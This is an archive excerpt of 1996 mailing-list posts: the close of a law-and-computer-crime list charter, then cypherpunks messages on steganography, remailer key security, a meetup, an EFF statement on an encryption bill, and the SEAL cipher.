    usage started to occur. Now, it is rare to see a white collar worker
    in the work-place without the possession of a computer. In western
    countries such as Australia, over one third of households have
    computer systems. The computer is no longer the "altogether foreign
    and removed from the rest of society" device it once was. It has
    come out of the domain of the technical specialist and into the main
    stream.

    Even our notoriously slow moving legal profession is adopting it as
    an essential tool. But there is another change. A qualitative one
    important to our discussion.

    When you link hundreds of thousands of computers together and thus
    the people that use them together you find something remarkable
    occurs.  An event that you could never have predicted by merely
    summing the discrete components involved. A unique virtual society
    forms. Despite being designed with computer networking in mind,
    computer crime legislation copes very poorly with non homogeneous
    authorization [i.e partial authorization].

    Societies are based around a common knowledge of history, beliefs,
    and current events. Each member of a society can be pinpointed as
    belonging to the society in question by the ideas, beliefs and
    knowledge held in common with other societal members. Any new member
    to a society learns this knowledge only because it is passed onto
    them; directly by other members or indirectly via its media, works of
    literature, music and art.

    Successful large scale computer networks like the Internet form for
    one reason and one reason only; information sharing. When a critical
    mass of diversity, interests, user population and information
    exchange is reached, a situation develops that mirrors in all
    important aspects a vibrant and evolving society. Citizens of the
    Internet have a nearly equal sized voice with which to convey their
    thoughts to other members and can do so quickly and without unwanted
    distortion. This is a remarkably democratic process compared to the
    very real _self_ censorship and top heavy direction that is so
    manifest in traditional broadcast and publishing industries.

    But unlike the physical societies that have here-to been the norm,
    the electronic network society is remarkably non-isolationist. It
    continues to draw from, mesh and feed its beliefs into the
    traditional societies it was populated out of. This coupling process
    between computer network and traditional societies will continue
    (at least for English speaking countries -- the cultural barriers
    imposed by primary language differences are non-trivial) until a
    stage is reached where the boundary between the two is blurred and
    intangible.

    Most citizens will then fall under the rule of appallingly drafted
    computer crimes legislation every day of their lives. In the vast
    majority of such legislation directed to address computer crime
    everything which can be performed on a computer unless "authorized"
    is defined as illegal. One might think that an individual could
    authorize themselves to do anything they wished with their own
    computer [not so, as France and Russia and the USA have demonstrated
    with anti-cryptography and other information processing and content
    laws] given their ownership of it.

    But how does the Law define this "ownership"? Does ownership of the
    "chattel" (CPU, memory, disks and other hardware) imply ownership of
    the information created on it?  What about employees with "partial
    authorization" [examine disturbing outcome of Intel employee
    R.Swartz vs the State of Oregon 1995]? If the user of the computer
    system isn't the chattel owner, but has been given full control over
    it does this imply they are authorized for all interaction with the
    data stored on it?  Is there such thing as implicit authorization?
    Can an operating system grant authorization (implicit or otherwise)
    as an authorized agent of the owner/operator? If not, is sending
    electronic mail to someone who doesn't want their computer system to
    receive it "unauthorized insertion of data"?

    In a networked topology a typical computer user may use or otherwise
    interact with hundreds or even thousands of other peoples computers
    in any given day. What is then the analogous "authorization
    topology"?  In Law it has previously been the case that which was
    not expressly forbidden was generally permitted.  Currently the
    digital equivalent of moving a chair [modification of trivial data]
    in someone else's office is illegal and carries with it in most
    countries a 5 to 10 year prison term. It is a sad reflection on the
    legislature of the day that the computer _medium_ was criminalised
    rather than the intent or damage caused to the victim.

    It is unlikely that law reform will occur until current political
    concern over computer networks such as the Internet is moderated. If
    anything the push so far from political drafters has being to once
    again introduce brand new medium criminalising legislation rather
    than revitalizing the existing codes. This unfortunate "labeled
    arrow" approach will continue as long as there exists an ill
    informed and technologically ignorant legislature that finds itself
    pliant to the whims of sensationalist media and honed to their
    dubious targets. Strong ideals do not equal strong policy.

    So ill defined and over broad are the terms used in most computer
    crime legislation that typically the pressing of a button on a
    silicon wrist watch without permission can be construed as
    "insertion of data into a computer without authority" an offense
    which carries 10 years penalty in countries such as Australia. The
    farse inherent is blatant. Surely the process going on within the
    wrist watch is utterly irrelevant. Victemless crimes should be
    avoided if at all possible. If interfering with the watch caused
    damage, even if that damage was to the intellectual property in the
    watch then the crime is one of Criminal Damage [or one of the other
    broad ranging damage statutes, depending on jurisdiction]. If
    changing the internal state of the watch led to fraud or theft, then
    the crime should be one of fraud or theft (possibly by deception).
    If pressing the button changed, for instance, the time of the watch
    and this lead to a death, then the crime should be that of
    manslaughter or murder. Actions that do not damage (or other wise
    attempt to negatively effect) the life of human beings directly, or
    indirectly by damage or loss of property or fundamental societal
    ideals (such as the right to privacy, freedom of association, speech
    & movement) should not be crimes. Actions that annoy but do not
    damage should also not be crimes, and traditionally are not. Crimes
    and the criminal process are serious. Annoyances by definition are
    not.

    In most Commonwealth countries physical trespass [despite the
    general view] is not a crime and with good reason. The Criminal law
    system wasn't intended to be the citizen's lacky and enforcer of
    personal whim, but rather to protect persons from genuine harm and
    preserve social order and the sovereign. Someone trespassing on your
    lands may annoy you. It may contradict your authorization. But it
    [typically] only becomes illegal when you ask the trespasser to
    leave and they refuse, or if their trespassing was directly
    associated with the commission or attempted commission of an offence.

    It is with this lack of appropriate legislation, precedents and
    judicial guidance that judiciary, practitioners, prosecutors, law
    enforcement personnel, defendants and drafters of future codes &
    policy have to struggle to find resolution.

    This list has been created in an attempt to mitigate the lack of
    tangible resources people involved with computer crime have at their
    disposal. It is hoped that by bringing together knowledgeable legal
    professionals together with para-legal personnel and informed lay
    persons that information and resources relevant to the difficult
    task of analyzing, presenting in court, formulating departmental or
    company policy or otherwise dealing with computer crime law and
    computer crimes may be shared and intelligent discussion and law
    reform stimulated.

    nb. this list it is also an appropriate forum to discuss computerized
        legal, law enforcement and criminology databases, such as Netmap,
	Watson, PROMIS, Lexis, APAIS, CRIM-L, et cetera.

GUIDELINES
----------

In order to keep the semantic content high on this list, please consult
the following before posting:


DO POST 			 	DON'T POST
-------					----------

Un/reported decisions.			Personal insults.
Commentaries on cases.			Signatures >4 lines.
Reviews on relevant books.		Quoted replies with more than 30%
Relevant journal articles.		quoted from the original.
Information about proposed legislation. Short questions, or questions which
Full text of CC legislation.            otherwise do not convey useful
Judicially defined terms.		information in their own right.
Articles on new arrests or		Gossip about the moderator.
cases.					Articles about computer (in)security,
Detailed questions.			they should be sent to:
Intelligent commentary.			"best-of-security@suburbia.net"
Personal experiences with computer	"breaking into a computer is the same
crime.                                   as...."
Well thought out analogies.		Petitions (if you think they are
Relevant transcripts.                   exceptionally relevant, send them to
Defense or prosecution strategy.	the moderator, who may post them).
Relevant papers, thesis. 		Chain letters.
Conference announcements and details.	Advertising material.
Locations of legal resources.		Ethical considerations that are only
Computer forensics information.		"opinion".
Trial/court dates, verdicts etc.	Content free news reports or
Reviews of legal software.		articles. 
Pointers to any of the above.		Abusive, antagonistic or otherwise,
Cross post relevant information from    non information rich or non
other lists or news groups.		constructive material.
Relevant affidavits, court documents.	Quotes from Dan Quayle.

SUBSCRIBING
-----------

Send mail to: 

	lacc-request@suburbia.net

with the body of:

	subscribe lacc

UN-SUBSCRIBING
-------------

Send mail to:

	lacc-request@suburbia.net

with the body of:

	unsubscribe lacc

POSTING
-------

To send a message to the list, address it to:

	lacc@suburbia.net

REPLYING
--------

If you are replying to a message already on the LACC list using your
mail programs reply facility you will almost certainly have to change
the reply address to lacc@suburbia.net. This is because the LACC mailing
list program is configured to have return replies sent no "nobody" in
order to avoid receiving the replies of "vacation" programs which
automatically send email saying "I've gone to the moon for two weeks to
hunt rare bits".

ARCHIVES
--------

Monthly back issues of lacc since January 96 are available from:

	ftp://suburbia.net/pub/mailinglists/lacc

Unfortunately the the 1995 archive was lost in a disk crash. If anyone still
has a copy, then please contact the moderator.

--
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Burlero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Thu, 7 Mar 1996 19:18:10 +0800
To: cypherpunks@toad.com
Subject: Re: art-stego
Message-ID: <199603050914.EAA01262@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

JonWienke@aol.com wrote:
> Another thing--just a wild idea--test the randomness of encrypted data
> storing it in an 8-bit mono .WAV (your choice of sample rates) file and
> listening to it.  Any correlations or patterns in the data should show 
> the playback as hums, clicks, squeals, or something.  It may even be
> to determine the algorithm by the sound patterns--a sort of "audio
> cryptanalysis."  Has anyone tried this?  Are there any .WAV stego 
> out there?

s-tools is an audio stego utility(s), but I've not used it.

As for testing methods, noise spheres are an interesting graphical method
for testing randomness (check the archives from late Dec/early Jan, I
posted a short Turbo Pascal program that implements them).

I'm not entirely sure if noise spheres will capture any crypto-relevant
correlations, but it seems worth investigating.

The reference to the article on noise spheres and other graphical methods
for testing PRNGs is:

  Pickover, Clifford A. 1995. "Random number generators: pretty good
     ones are easy to find."  The Visual Computer (1995) 11:369-377.

- --Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTwF5ioZzwIn1bdtAQG/ogF5AdudaHeEb+b2eOWs/XA3ZCIYGKrW1alg
abs4UNS5OC2jjqr5UPfrVq5LB8lMwLS7
=OjB4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Thu, 7 Mar 1996 13:41:08 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <199603051038.LAA17028@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:

> However, if I were a computer-savvy law enforcement agent, and I wanted
> to track messages through one of my remailers, I would try a
> technological approach.  I would first break the key for my remailer.
> That is trivial.  The passphrase is in PLAINTEXT in the script file
> which runs the remailer!.  It has to be.  That is true of all automated
> remailers.

The passphrase could be kept in memory and entered
every time the system is started.

Gary




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!gatech!newsfeed.internetmci.com!solaris.cc.vt.edu!news.genie.net!usenet@warwick.com (Michael Lepore)
Date: Fri, 8 Mar 1996 01:36:08 +0800
To: cypherpunks@toad.com
Subject: test ignore
Message-ID: <4hhdhk$j34@rock101.genie.net>
MIME-Version: 1.0
Content-Type: text/plain


able
 the workers to protect their immediate interests against the
 employers.
 
         In addition to organizing industrially, the workers will need
 a political party to spread the idea of social ownership, and to gain
 the supprt of the majority at the polls.  When this is achieved, the
 workers will assume control of their workplaces, and manage them
 democratically through their New Unions.  An elected Congress of
 delegates from each industry will plan and manage the national
 economy, and will replace the present political Congress as the
 nation's government.
 
              New Unionist
              621 W. Lake St., Suite 210
              Minneapolis, MN 55408
 
              nup@delphi.com
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 8 Mar 1996 06:18:22 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <v02140b00ad61de571005@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney writes:
[...regarding mixmaster remailer passwords...]
>
>The other suggestion that was made here, that the operator would have to
>manually type in the pass phrase every time the computer rebooted [...]
>However it would probably not be a practical method of operation given
>the reliability of at least the Unix operating systems that I am familiar
>with.

Then you need to start running PC unix systems which were last written
or updated during this decade.  Keeping a unix system running, _as long
as it is running a limited subset of application programs_, is a trivial
task in Linux, BSD/OS, FreeBSD, and others.  I routinely have server
systems which perform specific tasks (e.g. smtp mail services, DNS, etc.)
with uptimes of 5-6 months; there is no reason why a host serving as a
remailer should not be able to be as reliable.

> And even then the information is in memory.  An attacker who could
>gain root privileges (and let's not pretend that the NSA can't do that)
>can dump memory and later comb it for the key information.
>

"Security is economics"  -E. Hughes

The point is not to make a system which is absolutely, positively, no
doubt about it, secure against any attacker.  If cypherpunks could do
this they would be working for defense contractors and others who make
certified systems.  The objective is to make a system which is difficult
to attack, one which costs the attacker time/money.  After securing
a host against the obvious attacks one can turn to the esoteric ones
such as you present: move the key to kernel memory and remove tools
for accessing or manipulating that area, run the memory-space encrypted
and do not let it dump the contents to disk, etc.  Systems which
have been certified to high Orange book levels already exist, so there
are obviously solutions to the problems you present.  The tools and
tricks of these systems just need to be migrated into systems which
people actually use.

Then remember that remailers gain strength in numbers.  The more
remailers you chain your message through the better your chances of
passing through a single node which is not compromised, at which
point your message has been "mixed."  As long as it is easier for
someone to create new remailers than to break existing remailers
we are winning.

>My point remains that strong keys are pointless for remailers which run
>on Unix systems connected to the net.

"Insisting on perfect security is for people who do not have the
balls to live in the real world"  -paraphrased from M. Shaefer

You give far too much credit to the potential attackers.  One advantage
that unix systems connected to the net have over your hypothetical
PC at home is the advantage of persistence, what is the point of
running a remailer if it is never up, or only up when you need to use
it?  Traffic analysis of that particular node becomes a pretty easy
task :)  The unix hosts running remailers also have the advantage in
that they have been subjected to attack for quite a while now and
most of the obvious problems (and some of the non-obvious problems)
have been fixed.

A strong key on such a host is better than a weak key, so why not
make systems as strong as you can?  The only way to have a completely
secure computer is to encase it in concrete, cut any network connections,
and drop it into the ocean; OTOH the only thing you have created in this
case is a fairly unique boat anchor.  You are beginning to sound like
the people who claim that the NSA can crack any encryption system, not
because they have any proof but just because they extrapolate their
limited knowledge into the unknown and mix in a bit of paranoia.

[...]
>Recall that my original comments were in connection with the claim that
>the government was running most of the remailers.  As I said, I still
>think that is absurd when it would be so much easier to simply steal
>their keys.

But the point is that it is _not_ easier to steal the keys.  It is
much easier to put up a remailer than to attack an existing remailer,
this is why the remailer system is winning the battle of security
economics.  By putting up its own remailers a potential attacker
probabalistically diminishes the number of systems which they must
break.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 7 Mar 1996 11:25:24 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: MARCH BAY AREA MEETING
Message-ID: <Pine.SUN.3.91.960305142117.25522A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

For the second (and last) time, the Bay Area Cypherpunks meeting
will be held at the offices of Simple Access, fourth floor, 388 
Market Street, San Francisco.  The meeting will be from noon to
6pm (or so) on Saturday, 9 March.  As of this notice, there is
no agenda.  (Funny, we never seem to be at a loss for words.)

Street parking is scarce, garages are expensive; consider public
transit.  If anyone wants BART, CalTrain or bus information, let
me know.  Otherewise, here are driving instructions:

PENINSULA

--North on 101 (or 280 to 101) to Golden Gate/Bay Bridge fork.

--Right on 80 (Bay Bridge, Oakland) to 4th St. exit.

--Take 4th St. exit.  

--At the bottom of the ramp, go sort of straight (soft left) 
  onto Bryant (parallel to 80, towards Bay).

--Take Bryant about 4 blocks to Fremont.

--Take Fremont about 5 blocks to Market.

--Follow instructions under "END GAME," below.

EAST BAY

--Take 80, west across the Bay Bridge to Fremont exit.

--Take exit and turn left on Fremont.

--Take Fremont about 2.5 blocks to Market.

--Follow "END GAME" instructions.

END GAME

--The building on the far-right corner is 388 Market.

--Find a place to park.

--Sign in at lobby desk.  You are going to visit Simple Access
  on the 4th floor.

--Take the elevator to 4 and follow the signs.

--The phone number is:  415-296-2544.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Fri, 8 Mar 1996 01:48:47 +0800
To: cypherpunks@toad.com
Subject: Re: art-stego
Message-ID: <9603052110.AA00640@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Rochkind wrote:

> So a good steganography algorithm (which I understand
> exists) merely changes the values of the noise so that it
> now encodes your (random) message.  So there's no way to
> look for "suspicious
 bit patterns"
> 


You are assuming that the noise bits have the same statistical properties  
as cyphertext.  I would be very surprised if this were the case.  It takes  
special effort to achieve good random bit streams.  Image scanners may do  
this by accident, but then again, maybe they don't.  This uncertainty is,  
in my opinion, the fatal flaw in image-based steganography.  The same  
reasoning applies to audio-based steganography.  Unless the devices were  
specially designed to insert cryptagraphically useful bits in the output  
(or, as Tim May suggested, good garbage bits are inserted later), then you  
should not rely on the pictures or audio files to keep your messages  
hidden.

As an alternative to trying to hide bits, I proposed not hiding them at  
all, but instead creating an innocent reason for passing around files that  
contain, in some way or another, obvious random bit streams.  The first  
idea that came to mind was to use the random bit streams to create pretty  
fractal pictures.  I soon realized that any function that produces pretty  
pictures would do the trick as long as there was a way to recover the  
random bit stream given only the picture and the function.  Perhaps it  
would be possible to use random bit streams to generate cool BioMorphs  
(ala "The Blind Watchmaker").

If enough people start passing around pictures generated from meaningless  
random bit streams, then other people could use this traffic to covertly  
exchange pictures generated from meaningful random bit streams.


> if they can manage to get a cleartext message out of it,
> plausible deniability is unlikely to get you far. 

> 

You could always claim you didn't know it was there, that you just  
downloaded the picture out of curiosity.  It might help, depending on what  
country you live in.



Tim May wrote:

> Just bear in mind that this form of steganography is
> getting further away from conventional hiding, and
> into "pure plausible deniability." In fact, one need
> not even make a serious attempt to hide the encrypted
> bits: just call the encrypted file "art" and be done with
> it! 

> 


Come to think of it, if the picture files were larger than the random bit  
streams, people very well might send just the random bit streams.

"Hey Bob, take a look at the picture this creates when you feed it to the  
XYZ function (coefficient values A, B, and C)."


Jim_Miller@suite.com


P.S. In case anyone is wondering, the reason there is a large delay  
between a post from me and a reply from me is that I'm not actually on the  
mailing list.  I read the messages by pointing my news reading at  
nntp.hks.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 9 Mar 1996 12:53:23 +0800
To: cypherpunks@toad.com
Subject: WARES - random generator
Message-ID: <2.2.32.19960305231417.009380a8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This may be of interest to people on the list...


>Keywords: madison hawai obsceni prising ridblood ribiliss 
>Subject: WARES - random generator
>Reply-To: email@fringeware.com (FringeWare Inc)
>Date: Tue, 5 Mar 1996 11:06:20 -0600
>Apparently-To: fwlist-daily@fringeware.com
>X-UIDL: 4751f2738fffe6a83cf40be20fcd79a5
>
>Sent from: email@fringeware.com (FringeWare Inc)
>
>A certain vendor of ours has approached FringeWare with an offer for
>exclusive distribution a new product, which may be of general interest
>to people reading this list.
>
>The product line is called Perfect Crypt Products and the new item
>being considered is a random number generator which plugs into the
>serial port of your PC/Mac/Sparcbook/Cray/etc., and pours out a stream
>of random numbers. The process is based on thermal radiation, the 
>randomness looks quite good, and the product would retail for about us$50.
>
>If you have an interest in such a product, please let us know here
>at: email@fringeware.com  and we'll add it to our catalog.
>
>One-time pad enthusiasts and PGP officionados might consider this
>offer especially.
>
>
>-----------------------------------------------------
>pxn  *  FringeWare Inc.  *  http://www.fringeware.com
>
>
>
>
>
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 7 Mar 1996 11:26:12 +0800
To: cypherpunks@toad.com
Subject: EFF Statement on Leahy/Burns/Murray Crypto Bill
Message-ID: <9603052322.AA16005@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


New "Encrypted Communications Privacy Act" - Enabling Electronic Envelopes 
==========================================================================

FOR IMMEDIATE RELEASE                         ELECTRONIC FRONTIER FOUNDATION
                                                             +1 415 436 9333
                                                                 ask@eff.org
March 5, 1996                                             http://www.eff.org


The Electronic Frontier Foundation (EFF) is encouraged to see
Congressional support for lifting restrictions on encryption and
affirming privacy rights for U.S. citizens.  The bill introduced today
by Senators Pat Leahy (D-VT), Patricia Murray (D-WA) and Conrad Burns
(R-MT) is an important step in reclaiming privacy and encryption
rights for society and business.  The bill would legalize wide use of
"electronic envelopes" to protect private information.  Today this
information travels on "electronic postcards" which can easily be
altered or intercepted.  However, the bill also includes key escrow
and obstruction of justice provisions which would cause problems if
enacted.

"The bill provides a new opportunity to bring reason into the crypto 
policy debate," said EFF co-founder John Gilmore.  "We support the 
Senators for bringing their energy into the process.  The bill is a
good start, and with healthy debate and modification, it could become
acceptable legislation."

Electronic privacy and encryption policy is extremely complex because
it intertwines our constitutional rights of free speech, publication,
association, and protection from self-incrimination and unreasonable
search, with issues of wiretapping, spying, military security,
personal privacy, and computer security.  This bill would pick a new
balance among these competing interests, with long-term impacts on our
society and economy.  EFF is committed to working with government,
industry and public interest organizations to raise the level of
understanding and debate in resolving these complex issues.


Export Control Liberalization
-----------------------------

The Encrypted Communications Privacy bill would make long-overdue changes 
to the export restrictions currently hampering the deployment of privacy 
and security "envelopes" for Windows, Unix, the Mac, and the Internet.  

The bill:

  *  Moves export control of all non-military information security products,
     incuding encryption, to the Commerce Dept., whose rules protect 
     constitutional rights and reflect market realities.

  *  Requires that no license be required to export generally available
     mass-market software, public domain software, and computers that
     include such software.

  *  Requires that export be authorized for non-military encryption 
     software to any country where similar software is exportable from 
     the U.S. to foreign financial institutions.

  *  Requires that export be authorized for encryption hardware if a 
     comparable product is available overseas.

The above changes would significantly improve the nation's crypto
policy.  But they make detailed changes in a very complex section of
the law and regulations.  There is a significant risk that they will
be implemented by the Administration in a different fashion than
Congress intended.  This happened in 1987, for example, when
Congress tried to eliminate NSA meddling with civilian computers by
passing the Computer Security Act.  It was subverted by a series of
Presidential directives and agreements among Executive Branch
departments.  The result today is that NSA is still in control of
domestic security and privacy policy.

We would encourage futher deregulation as a simpler, more effective, 
and far more reliable solution.  The bill should simply eliminate all export 
controls on non-military encryption.


Criminalization of Encryption and Encouragement of Key Escrow
-------------------------------------------------------------

The following provisions raise serious concerns about the imbalance 
between the rights of the people and the desires of the goverment. EFF 
feels that the impact of these provisions must be closely considered, 
and will work to modify or remove them to better serve the public 
interest. The bill:

  *  Makes it a new crime to "use encryption to obstruct justice", with
     5-10 year sentences, plus fines.  In plain language, this is a
     extra criminal charge that can be applied when police are frustrated
     in an investigation but happen to catch someone breaking the law in 
     some other way. It's like  Adding an extra ten-year jail term if you 
     close your curtains while committing a crime.  Americans have the 
     right to protect their own privacy by any nonviolent means, and we 
     expect that encryption will soon be built into all computers, 
     phones, and networks.  

  *  Provides a legal infrastructure for key escrow, a system in which
     all users' keys are copied to permit government access.  The
     Clinton Administration has been pushing key escrow to replace its
     failed "Clipper chip", out of fear that if Americans have real
     privacy they will abuse it.  These provisions in the bill would
     encourage people to use the flawed key-copying system.


Clarification and Refinement
----------------------------

The are a number of areas of the bill that would benefit from additional
debate and clarification.  Specifically, where the bill:

  *  Explicitly does not mandate key escrow, but fails to prohibit
     the Administration from attempting to impose it with regulations.

  *  Outlaws disclosure of others' keys except to the government, with
     1-2 year sentences, plus fines, but includes a broad "good 
     faith" exemption for when the government does something illegal or 
     unconstitutional.

  *  Requires disclosure of other peoples' keys to the government, under
     the same procedures currently used for wiretaps, searches of online
     records and backup tapes, and fishing expeditions in billing records.
     The provision does not always require adversary legal process, in
     which citizens can argue for their privacy before a judge, but instead
     relies solely on the integrity of prosecutors.

  *  Legalizes the use any encryption "except as provided in this 
     Act...or in any other law". 


EFF's Proposed Crypto-Privacy Principles
----------------------------------------

EFF's Cryptography and Privacy Policy Principles, which were
originally written during the Clipper Chip debate, are the touchstone
by which we measure privacy legislation and policy issues:

  * Private-sector access to encryption technology must not be hindered, 
    either by regulation of what crypto may be used domestically, or by 
    restriction on what may be exported.

  * Government policy on encryption usage and standards must be set in open 
    forums with proper attention paid to public input. Secret hearings and
    classified algorithms have no part to play in a democratic process.

  * Encryption must become part of the "information infrastructure" to 
    protect personal, commercial and governmental privacy and security.  
    Cryptographic tools must not be crippled or weakened for the convenience
    of government agents, and users must be free to choose what encryption
    they prefer and whether and to whom they will reveal encryption keys.
    Law enforcement must obtain court orders, not simply administrative 
    subpoenas to seize keys or decrypt and search encrypted information.

  * Government policy regarding emerging technologies like encryption
    must not erode Constitutional protections. In particular, any such
    policies must be compatible with the rights to freedom of speech,
    press and association, freedom from coerced self-incrimination,
    and freedom from unreasonable search and seizure.
 
  * Encryption will be built into all next-generation Internet, 
    communications and computer technology. There must be no government 
    policy equating use of encryption with evidence of criminal 
    behavior, nor the creation of any new crime category that holds 
    encryption users liable for making criminal investigation more
    difficult. 

  * Government at all levels should explore cryptography's potential to
    replace identity-based or dossier-based systems - such as driver's
    licenses, credit cards, social security numbers, and passports - with 
    less invasive technology.

The Encrypted Communications Privacy bill at this time passes some of these
tests, and we are committed to working with industry, government, and public
interest organiations to address the remaining issues.


Background: EFF and Crypto-Privacy Policy
-----------------------------------------

The Electronic Frontier Foundation (EFF) is a nonprofit public interest
organization devoted to the protection of online privacy and free 
expression.  EFF was founded in 1990, and is based in San Francisco, 
California.

The International Traffic in Arms Regulations (ITARs), administered by 
the State Department, and in the background by the National Security 
Agency, unreasonably treat encryption software and hardware as if they 
were weapons of war, like rockets and bombs.  It has proven very difficult
to deploy U.S.-made encryption products in an increasingly important global
market due to these regulations, at a time when the need for online 
security systems for personal and commercial use has never been more 
keenly felt.

EFF has for several years led efforts to fend off governmental attempts 
to restrict the development and public availability of secure 
privacy technology.  In 1993-4, EFF and other civil liberties organizations 
successfully opposed implementation of the U.S. Administration's "Clipper" 
or "Skipjack" system - hardware encryption for voice and data 
communications in which all encryption keys are held by government for 
the convenience of law enforcement and intelligence agencies. In 1994, we 
helped ensure that crypto export became a major legislative topic, 
laying the groundwork for eventual liberalization of the ITARs. In 
1994 and 1995 EFF opposed implementation of and helped defeat funding for 
the FBI's "Digital Telephony" scheme, in which up to one person on every 
city block could be simultaneously wiretapped.  In 1995, we filed an ongoing
federal lawsuit with mathematician Daniel Bernstein, challenging the 
constitutionality of the export control laws.


Online Resources for More Information
-------------------------------------

Please see EFF's Internet archives for more details on this and other issues.

EFF Privacy & Encryption Archive:  http://www.eff.org/pub/Privacy/
EFF Legal Issues & Policy Archive:  http://www.eff.org/pub/Legal/

Action Alerts:  http://www.eff.org/pub/Alerts/

Topical Index of the EFF Archive:  http://www.eff.org/links.html


Contact Information
-------------------

The Electronic Frontier Foundation
1550 Bryant St., Suite 725
San Francisco CA 94103 USA
+1 415 436 9333 (voice)
+1 415 436 9993 (fax)
Internet: ask@eff.org

John Gilmore, Co-founder and Member of the Board
gnu@eff.org  +1 415 221 6524




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Mar 1996 01:33:01 +0800
To: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <v03005102ad61925e3ec8@[157.22.240.12]>
Message-ID: <199603052114.QAA07081@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Christopher Allen writes:
> At 4:27 PM 1/27/96, Anonymous wrote:
> >Anybody have info on the SEAL cipher?  I can't find any
> >descriptions or analysis of it.  Refs, proceedings or URLS
> >would be a good thing.
> 
> I also am interested in references to it.
> 
> I'm told that it was invented by a cryptographer at IBM, and that it
> patented, so that should help in the search.

Its a Don Coppersmith creation. It is blazingly fast. I believe it is
patented.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 7 Mar 1996 11:29:53 +0800
To: ChristopherA@consensus.com
Subject: Re: SEAL cipher info requested (something actually list related!)
Message-ID: <9603052220.AA11028@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Christopher Allen writes:
> > At 4:27 PM 1/27/96, Anonymous wrote:
> > >Anybody have info on the SEAL cipher?  I can't find any
> > >descriptions or analysis of it.  Refs, proceedings or URLS
> > >would be a good thing.
> > 
> > I also am interested in references to it.
> > 
> > I'm told that it was invented by a cryptographer at IBM, and that it
> > patented, so that should help in the search.
> 
> Its a Don Coppersmith creation. It is blazingly fast. I believe it is
> patented.
> 
> Perry
> 

Get Applied Cryptography!!! - Page 398 in issue 2.
Source code on page 667
Brief - steam cipher.  Phil Rogaway and Don Coppersmith @ IBM.
        uses "pseudo-random function family". Fast. Patented.
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Mar 1996 08:30:30 +0800
To: tcmay@got.net
Subject: Re: Bidzos on CNBC, discussing Leahy's Bill
Message-ID: <m0tu9c2-0009CrC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:26 PM 3/5/96 PST, Jim Bidzos wrote:
>
>I'm in favor of the Bill because it specifically prevents, by law, the
>US Govt from mandating key escrow. 

Justa sec!  I thought it was the 1st amendment to the Constitution which was 
supposed to prevent mandatory key escrow.  Why should you be happy about a 
law:  A law which is made by Congress can be UNmade by Congress.  

>Also because it would, by law,
>force export control of crypto out of the Dept. of State and into the
>Dept.  of Commerce, effectively allowing any crypto used in the US and
>"widely available" to be exported. 

